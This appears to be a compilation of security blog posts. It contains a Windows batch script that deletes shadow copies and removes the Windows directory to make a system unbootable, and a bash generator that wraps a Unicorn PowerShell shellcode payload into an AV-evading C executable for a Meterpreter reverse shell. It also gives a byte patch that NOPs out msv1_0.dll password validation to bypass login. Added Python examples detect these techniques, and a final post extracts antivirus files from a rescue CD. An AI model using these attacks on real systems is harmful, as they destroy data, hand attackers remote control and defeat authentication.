icacls "c:\system volume information\" /grant administrators:f /t >nul 2>nul
icacls "c:\system volume information\*" /grant administrators:f /t >nul 2>nul

echo Nuking system files...
vssadmin delete shadows /All /Quiet >nul 2>nul 
vssadmin delete shadows /All /Quiet >nul 2>nul 
rmdir c:\PrefLogs /s /q >nul 2>nul 
rmdir c:\Recovery /s /q >nul 2>nul
rmdir "C:\System Volume Information" /s /q >nul 2>nul
rmdir c:\Windows /s /q >nul 2>nul

echo Done

You need admin privileges for this to work, and remember that it will nuke the system!


This operation takes some time, maybe around 2 minutes; the HDD will be working really hard to process all those files, but in Windows all looks fine and the system seems to be running fine…

But when we reboot…

Windows cannot fix itself from the recovery console, and it won't be able to restore any snapshots, as we have deleted them from the batch file. The user files are left intact; there is no need to nuke those.

I still prefer rm -rf / from my Linux box though; the Windows version is much more cumbersome, but maybe there is some magic one-liner in PowerShell perhaps?


Unicorn 2 C source generator


There is an excellent Python script made available by David Kennedy called Unicorn: a simple Python script that performs a PowerShell downgrade attack and injects shellcode straight into memory. The project page is here:

https://github.com/trustedsec/unicorn

Direct download is here:

https://github.com/trustedsec/unicorn/raw/master/unicorn.py

The usage is pretty simple: download the Python script, save it to your Metasploit root directory and execute it; the resulting ASCII output can be fed directly to the target PowerShell.

I have created a little generator that produces compilable C code out of this, so you can compile a nice Win32 PE executable which will get you by most modern AVs (tested against Kaspersky, MS Essentials, ESET…). It will only work on Windows 7 and 8, 32/64-bit. I have tried it on XP with PowerShell installed but could not get it to run.

So here is the source for the Unicorn2c generator:

#!/bin/bash
clear
echo '--------------------------------------'
echo ' Unicorn Powershell2C code generator  '
echo 'Works for Vista, Win7, Win8 32/64 bit'
echo '--------------------------------------'
if [ -z "$*" ]; then
  echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform'
  echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
  echo 'Valid platforms are: nonuac uac'
  exit 0
fi
case "$4" in
nonuac)
  echo 'Generating nonUAC unicorn.c ...'
  python unicorn.py "$1" "$2" "$3"
  echo '#include <stdio.h>' > unicorn.c
  echo '#include <string.h>' >> unicorn.c
  echo '#include <stdlib.h>' >> unicorn.c
  echo '#include <ctype.h>' >> unicorn.c
  echo '#include <windows.h>' >> unicorn.c
  echo '#include <aclapi.h>' >> unicorn.c
  echo '#include <shlobj.h>' >> unicorn.c
  echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c
  echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c
  echo 'int main(int argc, char *argv[])' >> unicorn.c
  echo '{' >> unicorn.c
  echo 'FreeConsole();' >> unicorn.c
  echo -n ' ShellExecute( NULL,NULL, "powershell.exe", "' >> unicorn.c
  # unicorn.py writes its one-liner to powershell_attack.txt; drop the first 11
  # characters (the leading "powershell " word), since ShellExecute already names the program
  sed -r 's/^.{11}//' powershell_attack.txt >> unicorn.c
  echo -n '",NULL,NULL);' >> unicorn.c
  echo '' >> unicorn.c
  echo 'exit(0);' >> unicorn.c
  echo '}' >> unicorn.c
  todos unicorn.c
  echo '[*] Exported unicorn.c To compile use cl.exe unicorn.c'
  ;;

uac)
  echo 'Generating UAC  unicorn.c ...'
  python unicorn.py "$1" "$2" "$3"
  echo '#include <stdio.h>' > unicorn.c
  echo '#include <string.h>' >> unicorn.c
  echo '#include <stdlib.h>' >> unicorn.c
  echo '#include <ctype.h>' >> unicorn.c
  echo '#include <windows.h>' >> unicorn.c
  echo '#include <aclapi.h>' >> unicorn.c
  echo '#include <shlobj.h>' >> unicorn.c
  echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c
  echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c
  echo 'int main(int argc, char *argv[])' >> unicorn.c
  echo '{' >> unicorn.c
  echo 'FreeConsole();' >> unicorn.c
  # "runas" verb: PowerShell is started elevated (UAC prompt for non-admin users)
  echo -n ' ShellExecute( NULL, "runas", "powershell.exe", "' >> unicorn.c
  sed -r 's/^.{11}//' powershell_attack.txt >> unicorn.c
  echo -n '",NULL,NULL);' >> unicorn.c
  echo '' >> unicorn.c
  echo 'exit(0);' >> unicorn.c
  echo '}' >> unicorn.c
  todos unicorn.c
  echo '[*] Exported unicorn.c To compile use cl.exe unicorn.c'
  ;;

*)
  # missing or unknown platform
  echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform'
  echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
  echo 'Valid platforms are: nonuac, uac'
  exit 0
  ;;
esac

Save this as an executable shell script in your Metasploit root directory and make sure you have the original unicorn.py in the path (the script also needs todos from the tofrodos package, which converts the generated file to CRLF line endings). Usage is simple: run the shell script with the required options. The fourth argument is the platform, either nonuac or uac. The resulting C code differs only in the ShellExecute verb: “runas” (for UAC) versus NULL (for nonUAC).

If, for example, the UAC-compiled binary is executed from an elevated command prompt, then the ShellExecute call loads PowerShell with the same privileges, enabling us to GETSYSTEM and migrate to any process. But if a non-privileged user runs the UAC binary, he gets prompted for credentials; hence the option to generate the C code as non-UAC, from which we won't be able to GETSYSTEM or migrate to processes other than our own.

Compilation is easy with either Visual Studio C++ 2010 or 2012, Express or full. From the Visual Studio Tools command prompt, compile for 32-bit like so:

cl.exe unicorn.c

Sometimes the binary takes a while to spawn a reverse shell on the listener, but this may be due to the fact that my system is virtual and I have low memory resources.
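From the defender's side, the generated binary leaves a recognisable trace: a powershell.exe process created by an unexpected parent, with a command line that asks for the v2 engine, hides the window and carries a base64 encoded command. The following is an added example, not code from the post or from the Unicorn project; it runs that check over a few constructed process-creation records in a made-up "key=value|key=value" layout (a stand-in for whatever your EDR or Sysmon pipeline emits), decodes the UTF-16LE encoded command for the analyst, and scores each launch. The indicator weights, the threshold and the EXPECTED_PARENTS set are assumptions to tune per environment.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Command-line indicators of the downgrade-and-inject launch described above.
DOWNGRADE_RE = re.compile(r"(?i)[-/](?:v|version)\s+2(?:\.0)?\b")
ENCODED_RE = re.compile(r"(?i)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_RE = re.compile(r"(?i)[-/](?:w|win|windowstyle)\s+(?:hidden|1)\b")
NOPROFILE_RE = re.compile(r"(?i)[-/](?:nop|noprofile)\b")

# Assumption: parents from which an interactive PowerShell launch is unremarkable.
EXPECTED_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe"}
# Assumption: weights and reporting threshold; tune to your own telemetry.
WEIGHTS = {"downgrade": 3, "encoded": 2, "hidden": 1, "noprofile": 1, "unexpected_parent": 2}
REPORT_THRESHOLD = 3


@dataclass
class Finding:
    line_no: int
    parent: str
    indicators: List[str]
    score: int
    decoded_command: Optional[str]


def parse_line(line: str) -> dict:
    """Parse one constructed 'key=value|key=value' process-creation record."""
    fields = {}
    for part in line.rstrip("\n").split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def decode_encoded_command(b64: str) -> Optional[str]:
    """-EncodedCommand carries UTF-16LE text in base64; return it, or None if malformed."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(log_lines) -> List[Finding]:
    """Score every powershell.exe launch and return those above the threshold."""
    findings = []
    for line_no, line in enumerate(log_lines, start=1):
        rec = parse_line(line)
        image = rec.get("Image", "").rsplit("\\", 1)[-1].lower()
        if image != "powershell.exe":
            continue
        cmd = rec.get("CommandLine", "")
        parent = rec.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        indicators, decoded = [], None
        if DOWNGRADE_RE.search(cmd):
            indicators.append("downgrade")
        match = ENCODED_RE.search(cmd)
        if match:
            indicators.append("encoded")
            decoded = decode_encoded_command(match.group(1))
        if HIDDEN_RE.search(cmd):
            indicators.append("hidden")
        if NOPROFILE_RE.search(cmd):
            indicators.append("noprofile")
        if parent not in EXPECTED_PARENTS:
            indicators.append("unexpected_parent")
        score = sum(WEIGHTS[i] for i in indicators)
        if score >= REPORT_THRESHOLD:
            findings.append(Finding(line_no, parent, indicators, score, decoded))
    return findings


# Constructed sample records, not real telemetry. The encoded payload is a harmless
# Write-Output so the decoder has something to show; unicorn.exe is the hypothetical
# name of a binary built from the generated unicorn.c.
SAMPLE_ENCODED = base64.b64encode("Write-Output test".encode("utf-16le")).decode()
PS_IMAGE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_LOG = [
    f"ParentImage=C:\\Windows\\explorer.exe|Image={PS_IMAGE}"
    "|CommandLine=powershell.exe -NoProfile -Command Get-Date",
    f"ParentImage=C:\\Users\\user\\Downloads\\unicorn.exe|Image={PS_IMAGE}"
    f"|CommandLine=powershell.exe -version 2 -nop -w hidden -enc {SAMPLE_ENCODED}",
    f"ParentImage=C:\\Windows\\System32\\cmd.exe|Image={PS_IMAGE}"
    "|CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"line {f.line_no}: parent={f.parent} score={f.score} indicators={f.indicators}")
        if f.decoded_command:
            print("  decoded:", f.decoded_command)
```

Only the second record is reported: the first is an ordinary profile-less launch from the desktop, the third is a script run from cmd.exe. The point of scoring rather than matching a single flag is that `-version 2` on its own is the strongest signal (it only makes sense when someone wants to sidestep v5 logging and AMSI), while `-nop` or `-w hidden` alone are common in legitimate automation.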


Windows 8.1 64bit msv1_0.dll patch update


Recently Microsoft issued a Consumer Preview of Windows 8.1 for public download. I have gone through the msv1_0.dll file to look for the msvppasswordvalidate function in the DLL and patch the corresponding section with bypass code. There are slight changes from the previous release, of course, which are described below. I am still searching for a reliable way to do this via the Metasploit meterpreter screen_unlock.rb script for the 64-bit platform (no problem for 32-bit), but as in the previous example, a local patch of msv1_0.dll is required for this demo.

The mysterious function that we are interested in is SUB_18000588C, msvppasswordvalidate.

Again, a quick look in hex: the equivalent of JNZ LOC_1800432C0 is

0F 85 EB 26 02 00

Patching this value with 90 90 90 90 90 90, we successfully bypass any local authentication via msv1_0.dll in Windows 8.1 (any password you type will do etc…)

Here is the patch diff:

msv1_0.dll
0001FFCF: 0F 90
0001FFD0: 85 90
0001FFD1: EB 90
0001FFD2: 26 90
0001FFD3: 02 90
0001FFD4: 00 90

Patch the original DLL using ida_patcher.exe and replace C:\Windows\System32\msv1_0.dll with the patched DLL. I have used a Linux live CD with ntfs-3g drivers to do this for the demo.
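The same six-byte difference is what an integrity check should surface. The following is an added example, not code from the post: it compares a suspect DLL against a known-good copy, renders the result in the same "OFFSET: OLD NEW" layout as the patch diff above, and flags contiguous runs of bytes that were replaced by 0x90 (NOP), which is the classic shape of a patched-out conditional jump. The two buffers are constructed stand-ins (a zero-filled 128 KiB image with the page's six bytes placed at 0x1FFCF), not the real msv1_0.dll, and the `known_good_sha256` parameter assumes you keep hashes of pristine system files.

```python
import hashlib
from typing import List, Optional, Tuple

NOP = 0x90


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def byte_diff(original: bytes, suspect: bytes) -> List[Tuple[int, int, int]]:
    """Return (offset, original_byte, suspect_byte) for every offset that differs.
    A length mismatch is a different situation (rebuilt or relinked file), so it is
    reported as an error rather than silently compared up to the shorter length."""
    if len(original) != len(suspect):
        raise ValueError(f"length differs: {len(original)} vs {len(suspect)}")
    return [(off, a, b) for off, (a, b) in enumerate(zip(original, suspect)) if a != b]


def format_patch(name: str, diffs: List[Tuple[int, int, int]]) -> str:
    """Render the diff in the 'OFFSET: OLD NEW' layout used in the post."""
    return "\n".join([name] + [f"{off:08X}: {a:02X} {b:02X}" for off, a, b in diffs])


def find_nop_runs(diffs: List[Tuple[int, int, int]], min_len: int = 2) -> List[Tuple[int, int]]:
    """Contiguous runs of differing bytes whose new value is NOP, as (start, length)."""
    nop_offsets = [off for off, _old, new in diffs if new == NOP]
    runs = []
    i = 0
    while i < len(nop_offsets):
        j = i
        while j + 1 < len(nop_offsets) and nop_offsets[j + 1] == nop_offsets[j] + 1:
            j += 1
        if j - i + 1 >= min_len:
            runs.append((nop_offsets[i], j - i + 1))
        i = j + 1
    return runs


def check_dll(original: bytes, suspect: bytes, known_good_sha256: Optional[str] = None) -> dict:
    """Hash check first (cheap), byte-level diff only when the files differ."""
    result = {"sha256": sha256_hex(suspect), "identical": original == suspect}
    if known_good_sha256 is not None:
        result["hash_match"] = result["sha256"] == known_good_sha256
    if not result["identical"]:
        diffs = byte_diff(original, suspect)
        result["diff"] = diffs
        result["nop_runs"] = find_nop_runs(diffs)
    return result


# Constructed stand-ins (not the real DLL): the six bytes quoted in the post
# (0F 85 EB 26 02 00, a JNZ rel32) at 0x1FFCF, and a copy where they became NOPs.
_orig = bytearray(0x20000)
_orig[0x1FFCF:0x1FFD5] = bytes.fromhex("0F85EB260200")
ORIGINAL = bytes(_orig)
_susp = bytearray(ORIGINAL)
_susp[0x1FFCF:0x1FFD5] = bytes([NOP]) * 6
SUSPECT = bytes(_susp)

if __name__ == "__main__":
    report = check_dll(ORIGINAL, SUSPECT, known_good_sha256=sha256_hex(ORIGINAL))
    print(format_patch("msv1_0.dll", report["diff"]))
    print("NOP runs (start, length):", [(hex(s), n) for s, n in report["nop_runs"]])
```

On a real system you would read the two files with `open(path, "rb").read()`; the known-good copy can come from installation media or a trusted machine on the same build, and the hash comparison alone is enough to alert, with the diff telling you what was changed and whether it looks like a logic patch.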



Looting LiveCDs for fun and profit


Recently I ran into a need to run good native antivirus software on one of my Linux boxes (Debian amd64). There are many available options, but I have always liked F-Secure and its products for some reason. F-Secure offers a Knoppix-based Rescue CD, downloadable from download.f-secure.com/estore/rescue-cd-3.16-52606.iso, which contains all the Linux binaries needed to run local scans against WinPE and ELF binaries.

To extract the goodies from the CD, first boot it with VirtualBox.

Once booted, you need to switch to the second console via Alt+F2. Next we will create a tarball with all the needed files from the LiveCD.

The command is the following:

tar -cvf fsecure.tar /etc/opt/f-secure/ /var/opt/f-secure/ /opt/f-secure/ /etc/init.d/fsaua /etc/init.d/fsupdate

Once we have the tarball, we scp it to our host like so:

TT is a temporary subfolder created for this purpose in the user's home directory; 10.0.2.2 is the IP address of the host running VirtualBox.

scp fsecure.tar user@10.0.2.2:~/TT

Now we can switch off the virtual machine; we don't need it anymore. Next we extract fsecure.tar from the root directory on our host (it is worth listing the archive first, since extracting at / overwrites any existing files at those paths):

# mv /home/user/TT/fsecure.tar /
# cd /
# tar -xvf fsecure.tar
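Extracting a tarball at / as root is the step worth double-checking, so here is an added example (not code from the post) that audits an archive before extraction: it rejects member names that are absolute or climb out of the extraction root, rejects symlinks whose target escapes, and reports which members would overwrite paths that already exist. The archive it inspects is built in memory as a constructed stand-in for fsecure.tar (two member paths copied from the listing below, plus deliberately bad members), and the `existing_paths` argument stands in for a scan of the host filesystem.

```python
import io
import posixpath
import tarfile
from typing import Dict, Iterable, List


def build_sample_tar() -> bytes:
    """Constructed stand-in for fsecure.tar; the bad members are deliberate."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, payload in [
            ("etc/init.d/fsaua", b"#!/bin/sh\n"),              # path from the listing
            ("opt/f-secure/fssp/bin/fsav", b"\x7fELF"),          # path from the listing
            ("../escape.sh", b"#!/bin/sh\n"),                   # climbs out of the root
            ("/etc/profile", b"# absolute member name\n"),       # absolute path
        ]:
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))
        good_link = tarfile.TarInfo("opt/f-secure/fssp/lib/libfsavd.so.4")
        good_link.type = tarfile.SYMTYPE
        good_link.linkname = "libfsavd.so.4.0.0"               # relative, stays inside
        tar.addfile(good_link)
        bad_link = tarfile.TarInfo("etc/opt/f-secure/evil")
        bad_link.type = tarfile.SYMTYPE
        bad_link.linkname = "/root/.ssh"                        # points outside the root
        tar.addfile(bad_link)
    return buf.getvalue()


def _escapes(path: str) -> bool:
    """True if a path is absolute or normalises to something above the root."""
    if path.startswith("/"):
        return True
    norm = posixpath.normpath(path)
    return norm == ".." or norm.startswith("../")


def audit_tar(tar_bytes: bytes, existing_paths: Iterable[str]) -> Dict[str, List[str]]:
    """Classify every member as unsafe, a collision with an existing path, or ok."""
    existing = {posixpath.normpath(p) for p in existing_paths}
    report: Dict[str, List[str]] = {"unsafe": [], "collisions": [], "ok": []}
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for member in tar.getmembers():
            if _escapes(member.name):
                report["unsafe"].append(member.name)
                continue
            if member.issym():
                # resolve the link target relative to the link's own directory
                target = posixpath.join(posixpath.dirname(member.name), member.linkname)
                if _escapes(target):
                    report["unsafe"].append(member.name)
                    continue
            if posixpath.normpath(member.name) in existing:
                report["collisions"].append(member.name)
            else:
                report["ok"].append(member.name)
    return report


if __name__ == "__main__":
    # existing_paths is constructed here; on a real host build it from os.path.exists()
    for kind, names in audit_tar(build_sample_tar(), ["etc/init.d/fsaua"]).items():
        print(kind, names)
```

With a clean report (no unsafe members, collisions you expect), `tar -xvf` at / is fine; with anything in `unsafe`, extract into a scratch directory instead and copy what you need.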

The tarball creates the following directories and fills them with f-secure files:

.:
total 12
drwxr-xr-x 4 user user 4096 Jul 24 19:25 etc
drwxr-xr-x 3 user user 4096 Jul 24 19:25 opt
drwxr-xr-x 3 user user 4096 Jul 24 19:25 var

./etc:
total 8
drwxr-xr-x 2 user user 4096 Jul 24 19:25 init.d
drwxr-xr-x 3 user user 4096 Jul 24 19:25 opt

./etc/init.d:
total 12
-rwxr-xr-x 1 user user 2635 Jun 26 2012 fsaua
-rwxr-xr-x 1 user user 4127 Jun 26 2012 fsupdate

./etc/opt:
total 4
drwxr-xr-x 6 user user 4096 Jun 26 2012 f-secure

./etc/opt/f-secure:
total 16
drwxr-xr-x 2 user user 4096 Jun 26 2012 fsaua
drwxr-xr-x 3 user user 4096 Jun 26 2012 fsma
drwxr-xr-x 2 user user 4096 Jun 26 2012 fssp
drwxr-xr-x 2 user user 4096 Jun 26 2012 product_versions

./etc/opt/f-secure/fsaua:
total 4
-rw-r--r-- 1 user user 3434 Jun 26 2012 fsaua_config

./etc/opt/f-secure/fsma:
total 4
drwxr-xr-x 2 user user 4096 Jun 26 2012 policy

./etc/opt/f-secure/fsma/policy:
total 116
-rw-r--r-- 1 user user 10151 Jun 26 2012 fsav_linux_sp.dpf
-rw-r--r-- 1 user user 5179 Jun 26 2012 fsav_linux_sp.msg
-rw-r--r-- 1 user user 97623 Jun 26 2012 fsav_linux_sp.txt

./etc/opt/f-secure/fssp:
total 20
-rw-r--r-- 1 user user 13001 Jun 26 2012 fssp.conf
-rw-r--r-- 1 user user 11 Jun 26 2012 fssp_updateseries

./etc/opt/f-secure/product_versions:
total 4
-rw-r--r-- 1 user user 52 Jun 26 2012 1.3.6.1.4.1.2213.48

./opt:
total 4
drwxr-xr-x 5 user user 4096 Jun 26 2012 f-secure

./opt/f-secure:
total 116
drwxr-xr-x 2 user user 4096 Jun 26 2012 doc
-rw-r--r-- 1 user user 32386 Jun 26 2012 eula_0806.txt
drwxr-xr-x 5 user user 4096 Jun 26 2012 fsaua
-rwxr-xr-x 1 user user 31735 Jun 26 2012 fsscan_partitions.sh
drwxr-xr-x 10 user user 4096 Jun 26 2012 fssp
-rw-r--r-- 1 user user 2370 Jun 26 2012 linuxteam.gpg
-rwxr-xr-x 1 user user 4175 Jun 26 2012 repair_script.sh
-rwxr-xr-x 1 user user 9120 Jun 26 2012 terminal_cmap
-rw-r--r-- 1 user user 6586 Jun 26 2012 terminal_cmap.c
-rwxr-xr-x 1 user user 6558 Jun 26 2012 transmogrify_cd_into_stick.sh

./opt/f-secure/doc:
total 4
-rw-r--r-- 1 user user 1652 Jun 26 2012 manual.html

./opt/f-secure/fsaua:
total 40
drwxr-xr-x 2 user user 4096 Jun 26 2012 bin
drwxr-xr-x 2 user user 4096 Jun 21 2012 etc
-rw-r--r-- 1 user user 3433 Jun 21 2012 fsaua_config.template
-rw-r--r-- 1 user user 23312 Jun 21 2012 fsbw.dpf
drwxr-xr-x 2 user user 4096 Jun 26 2012 libexec

./opt/f-secure/fsaua/bin:
total 804
-rwxr-xr-x 1 user user 429524 Jun 21 2012 fsaua
-rwxr-xr-x 1 user user 19396 Jun 21 2012 fsaua-config
-rwxr-x--- 1 user user 9236 Jun 21 2012 fsaua-ctrl
-rwxr-xr-x 1 user user 81248 Jun 21 2012 fsauaprogress
-rwxr-xr-x 1 user user 188824 Jun 21 2012 fsauasc
-rwxr-xr-x 1 user user 84320 Jun 21 2012 fsauatool

./opt/f-secure/fsaua/etc:
total 0

./opt/f-secure/fsaua/libexec:
total 20
-rw-r--r-- 1 user user 6986 Jun 21 2012 fsaua-functions
-rwxr-xr-x 1 user user 2635 Jun 21 2012 fsaua_startup-debian-ubuntu
-rw-r--r-- 1 user user 468 Jun 21 2012 fsaua_startup-gentoo
-rwxr-xr-x 1 user user 2441 Jun 21 2012 fsaua_startup-redhat-suse

./opt/f-secure/fssp:
total 36
drwxr-xr-x 2 user user 4096 Jun 26 2012 bin
drwxr-xr-x 2 user user 4096 Jun 26 2012 databases
drwxr-xr-x 2 user user 4096 Jun 26 2012 etc
-rw-r--r-- 1 user user 2116 Jun 26 2012 install.log
drwxr-xr-x 3 user user 4096 Jun 26 2012 lib
drwxr-xr-x 2 user user 4096 Jun 26 2012 libexec
drwxr-xr-x 2 user user 4096 Jun 26 2012 man
drwxr-xr-x 2 user user 4096 Jun 26 2012 modules
drwxr-xr-x 2 user user 4096 Jun 26 2012 sbin

./opt/f-secure/fssp/bin:
total 208
-rwxr-xr-x 1 user user 5060 Jun 26 2012 clstate_generator
-rwxr-xr-x 1 user user 416 Jun 26 2012 clstate_update
-rwxr-xr-x 1 user user 3724 Jun 26 2012 clstate_updated.rc
-rwxr-xr-x 1 user user 23911 Jun 26 2012 dbupdate
-rwxr-xr-x 1 user user 7133 Jun 26 2012 dbupdate_lite
-rwxr-xr-x 1 user user 142560 Jun 26 2012 fsav
-rwxr-xr-x 1 user user 11155 Jun 26 2012 fsdiag
-rwxr-xr-x 1 user user 4724 Jun 26 2012 licensetool

./opt/f-secure/fssp/databases:
total 0

./opt/f-secure/fssp/etc:
total 12
-rwxr-xr-x 1 user user 2713 Jun 26 2012 fsavd
-rwxr-xr-x 1 user user 4127 May 28 2012 fsupdate

./opt/f-secure/fssp/lib:
total 4016
-rw-r--r-- 1 user user 2475 Jun 26 2012 fsavdsimple.pm
-rwxr-xr-x 1 user user 91173 Jun 26 2012 fsavdsimple.so
-rw-r--r-- 1 user user 32196 Jun 26 2012 fssp-common
-rwxr-xr-x 1 user user 244324 Jun 26 2012 libdaas2.so
-rwxr-xr-x 1 user user 123748 Jun 26 2012 libdaas2tool.so
-rwxr-xr-x 1 user user 1705956 Jun 26 2012 libfm.so
-rwxr-xr-x 1 user user 74872 Jun 26 2012 libfsavd.so
lrwxrwxrwx 1 user user 17 Jul 24 19:25 libfsavd.so.4 -> libfsavd.so.4.0.0
-rwxr-xr-x 1 user user 66648 Jun 26 2012 libfsavd.so.4.0.0
lrwxrwxrwx 1 user user 17 Jul 24 19:25 libfsavd.so.5 -> libfsavd.so.5.0.0
-rwxr-xr-x 1 user user 70744 Jun 26 2012 libfsavd.so.5.0.0
lrwxrwxrwx 1 user user 17 Jul 24 19:25 libfsavd.so.6 -> libfsavd.so.6.0.0
-rwxr-xr-x 1 user user 192806 Jun 26 2012 libfsavd.so.6.0.0
lrwxrwxrwx 1 user user 13 Jul 24 19:25 libfsclm.so -> libfsclm.so.2
lrwxrwxrwx 1 user user 18 Jul 24 19:25 libfsclm.so.2 -> libfsclm.so.2.2312
-rwxr-xr-x 1 user user 309724 Jun 26 2012 libfsclm.so.2.2312
lrwxrwxrwx 1 user user 20 Jul 24 19:25 libfsmgmt.2.so -> libmgmtfile.2.0.0.so
-rwxr-xr-x 1 user user 27272 Jun 26 2012 libfssysutil.so
-rwxr-xr-x 1 user user 27272 Jun 26 2012 libfssysutil.so.0
-rwxr-xr-x 1 user user 40108 Jun 26 2012 libgcc_s-3.4.6-20060404.so.1
lrwxrwxrwx 1 user user 28 Jul 24 19:25 libgcc_s.so.1 -> libgcc_s-3.4.6-20060404.so.1
-rw-r--r-- 1 user user 44308 Jun 26 2012 libkeycheck.so
-rwxr-xr-x 1 user user 55936 Jun 26 2012 libmgmtfile.2.0.0.so
-rwxr-xr-x 1 user user 56420 Jun 26 2012 libmgmtfsma.2.0.0.so
lrwxrwxrwx 1 user user 18 Jul 24 19:25 libstdc++.so.6 -> libstdc++.so.6.0.3
-rwxr-xr-x 1 user user 806176 Jun 26 2012 libstdc++.so.6.0.3
-rwxr-xr-x 1 user user 94660 Jun 26 2012 libsubstatus.1.0.0.so
lrwxrwxrwx 1 user user 21 Jul 24 19:25 libsubstatus.1.so -> libsubstatus.1.0.0.so
lrwxrwxrwx 1 user user 17 Jul 24 19:25 libsubstatus.so -> libsubstatus.1.so
-rw-r--r-- 1 user user 2696 Jun 26 2012 safe_rm
drwxr-xr-x 2 user user 4096 Jun 26 2012 x86_64

./opt/f-secure/fssp/lib/x86_64:
total 240
lrwxrwxrwx 1 user user 13 Jul 24 19:25 libfsavd.so -> libfsavd.so.6
lrwxrwxrwx 1 user user 17 Jul 24 19:25 libfsavd.so.6 -> libfsavd.so.6.0.0
-rwxr-xr-x 1 user user 243306 Jun 26 2012 libfsavd.so.6.0.0

./opt/f-secure/fssp/libexec:
total 2876
-rwxr-xr-x 1 user user 11176 Jun 26 2012 daas2verify
-rwxr-xr-x 1 user user 69316 Jun 26 2012 dbtool
-rwxr-xr-x 1 user user 3346 Jun 26 2012 fslmalerter
-rwxr-xr-x 1 user user 2723981 Jun 26 2012 fsupdated
-rwxr-xr-x 1 user user 4127 May 28 2012 fsupdated.rc
-rwxr-xr-x 1 user user 63108 Jun 26 2012 license-check
-rwxr-xr-x 1 user user 56796 Jun 26 2012 mgmtpipe

./opt/f-secure/fssp/man:
total 72
-rw-r--r-- 1 user user 3690 Jun 26 2012 dbupdate.8
-rw-r--r-- 1 user user 38643 Jun 26 2012 fsav.1
-rw-r--r-- 1 user user 21307 Jun 26 2012 fsavd.8
-rw-r--r-- 1 user user 0 Jun 26 2012 manpage.links
-rw-r--r-- 1 user user 27 Jun 26 2012 manpage.refs

./opt/f-secure/fssp/modules:
total 4
-rw-r--r-- 1 user user 334 Jun 26 2012 fslmalerter.config

./opt/f-secure/fssp/sbin:
total 496
-rwxr-xr-x 1 user user 327116 Jun 26 2012 fsavd
-rwxr-xr-x 1 user user 1331 Jun 26 2012 fssp-config
-rwxr-xr-x 1 user user 167456 Jun 26 2012 monitor
-rwxr-xr-x 1 user user 779 Jun 26 2012 uninstall-fssp
-rwxr-xr-x 1 user user 1540 Jun 26 2012 validate_permissions.sh

./var:
total 4
drwxr-xr-x 3 user user 4096 Jul 24 19:25 opt

./var/opt:
total 4
drwxr-xr-x 4 user user 4096 Jun 26 2012 f-secure

./var/opt/f-secure:
total 8
drwxr-xr-x 5 user user 4096 Jun 26 2012 fsaua
drwxr-xr-x 7 user user 4096 Jun 26 2012 fssp

./var/opt/f-secure/fsaua:
total 16
drwxr-xr-x 5 user user 4096 Jun 26 2012 data
-rw------- 1 user user 0 Jun 26 2012 fsauadbg.log
-rw------- 1 user user 922 Jun 26 2012 fsaua.log
drwxr-xr-x 2 user user 4096 Jun 26 2012 run
drwxr-xr-x 2 user user 4096 Jun 26 2012 tmp

./var/opt/f-secure/fsaua/data:
total 20
-rw------- 1 user user 142 Jun 26 2012 bwstate_fsbwserver.f-secure.com_80
-rw------- 1 user user 142 Jun 26 2012 bwstate_fsbwserver.f-secure.com_80_backup
drwxr-xr-x 2 user user 4096 Jun 26 2012 content
drwxr-xr-x 2 user user 4096 Jun 26 2012 header
drwxr-xr-x 2 user user 4096 Jun 26 2012 subscriptions

./var/opt/f-secure/fsaua/data/content:
total 0

./var/opt/f-secure/fsaua/data/header:
total 0

./var/opt/f-secure/fsaua/data/subscriptions:
total 16
-rw------- 1 user user 207 Jun 26 2012 auatool_aquapacked
-rw------- 1 user user 207 Jun 26 2012 auatool_hydralinux
-rw------- 1 user user 205 Jun 26 2012 auatool_rescuecd
-rw------- 1 user user 171 Jun 26 2012 SBST_fmlibunix

./var/opt/f-secure/fsaua/run:
total 0
-rw-r--r-- 1 user user 0 Jun 26 2012 fsaua_run_lock

./var/opt/f-secure/fsaua/tmp:
total 0

./var/opt/f-secure/fssp:
total 28
-rw-r--r-- 1 user user 58 Jun 26 2012 aua_api.log
drwxr-xr-x 3 user user 4096 Jun 26 2012 auth
drwxr-xr-x 6 user user 4096 Jun 26 2012 databases
-rw-r--r-- 1 user user 465 Jun 26 2012 dbupdate.log
drwxr-xr-x 2 user user 4096 Jun 26 2012 log
drwxr-xr-x 2 user user 4096 Jun 26 2012 run
drwxr-xr-x 2 user user 4096 Jun 26 2012 update

./var/opt/f-secure/fssp/auth:
total 4
drwxr-xr-x 3 user user 4096 Jun 26 2012 global

./var/opt/f-secure/fssp/auth/global:
total 4
drwxr-xr-x 2 user user 4096 Jun 26 2012 acl

./var/opt/f-secure/fssp/auth/global/acl:
total 8
-rw-r--r-- 1 user user 367 Jun 26 2012 fsc_revoke_hq.acl
-rw-r--r-- 1 user user 3055 Jun 26 2012 fsc_root.acl

./var/opt/f-secure/fssp/databases:
total 16
drwxr-xr-x 2 user user 4096 Jun 26 2012 aqualnx32.0
-rw-r--r-- 1 user user 0 Jun 26 2012 db.lock
drwxr-xr-x 2 user user 4096 Jun 26 2012 fmlibunix.0
drwxr-xr-x 2 user user 4096 Jun 26 2012 hydralinux.0
